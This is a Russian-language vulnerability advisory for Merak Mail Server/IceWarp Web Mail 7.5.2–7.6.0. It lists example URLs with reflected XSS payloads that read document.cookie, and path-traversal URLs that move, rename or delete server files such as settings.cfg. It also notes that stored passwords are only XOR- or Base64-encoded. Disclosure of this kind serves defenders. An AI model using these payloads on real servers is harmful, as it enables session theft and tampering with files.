Программа: Merak Mail Server with IceWarp Web Mail 7.5.2, 7.6.0 

Обнаружено несколько уязвимостей в Merak Mail Server. Удаленный атакующий может выполнить межсайтовый скриптинг; удаленный авторизованный пользователь может обойти ограничения безопасности.

Некоторые сценарии некорректно обрабатывают входные данные пользователей. Удаленный атакующий может создать специально сформированный URL и получить доступ к важным данным пользователей. Примеры:

http://[target]:32000/mail/send.html?id=[sessionid]&redirectfile="> <script>alert(document.cookie)</script>
http://[target]:320 00/mail/send.html?id=[sessionid]&Old_Folder="> <script>alert(document.cookie)</script>
http://[target]:32000/mail/send.html?id=[sessionid]&Old_Message=" ><s cript>alert(document.cookie)</script>
http://[target]:32000/mail/send.html?id=[sessionid]&xwritesentcopy=
"><script>alert(document.cookie)</script>
http://[target]:32000/mail/send.html?id=[sessionid]&returnreceipt="> <script>alert(document.cookie)</script>
http://[target]:32000/mail/send.html?id=[sessioni d]&forwardfile="> <script>alert(document.cookie)</script>
http://[target]:32000/mail/send.html?id=[sessionid]&writepriority="
><script>alert(document.coo kie)</script>
http://[target]:32000/mail/send.html?id=[sessionid]&copyfolder="> <script>alert(document.cookie)</script>
http://[target]:32000/mail/send .html?id=[sessionid]&messageid="> <script>alert(document.cookie)</script>
http://[target]:32000/mail/attachment.html?id=[sessionid]&attachmentpage
_text_error=<script>alert(document.cookie)</script>
http://[target]:32000/mail/attachment.html?id=[session id]&attachmentpage_text_title=</title>&lt;script&gt;alert(
document.cookie)&lt;/
http://[target]:32000/mail/folderitem.html?id=[session id]&folderold=
">&lt;script&gt;alert(document.cookie)&lt;/script&gt;

Также сообщается, что удаленный авторизованный пользователь может из-за уязвимости в сценарии 'viewaction.html' создать и удалить произвольные директории на сервере. Пример:

http://[target]:32000/mail/viewaction.html?id=[sessionid]&folder=
../../../../../../../[arbitarydirectory]&Move_x=1&originalfolder=blabla

http://[target]:32000/mail/viewaction.html?id=[sessionid]&messageid=
...//...//...//...//&#8230;//&# 8230;//&#8230;//winnt/system32/cmd.exe&

Удаленный авторизованный атакующий может перемесить произвольные файлы на системе:

http://[target]:32000/mail/viewaction.html?id=[session id]&messageid=...//...//...//...//config/settings.cfg&Move_x
=1&originalfolder=blabla&m

Удаленный авторизованный пользователь может переименовать произвольный файл на системе: 

http://[target]:32000/mail/folders.html?id=[session id]&folderold=blabla/...//...//...//...//config/
settings.cfg&folder=blabla/...//...//...//...//cm

Локальный пользователь может расшифровать пароли пользователей, которые хранятся в файлах users.cfg, settings.cfg (XOR), users.dat, and user.dat (Base64)

Удаленный авторизованный пользователь может создать файл 'accounts.dat' с произвольным содержимым.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии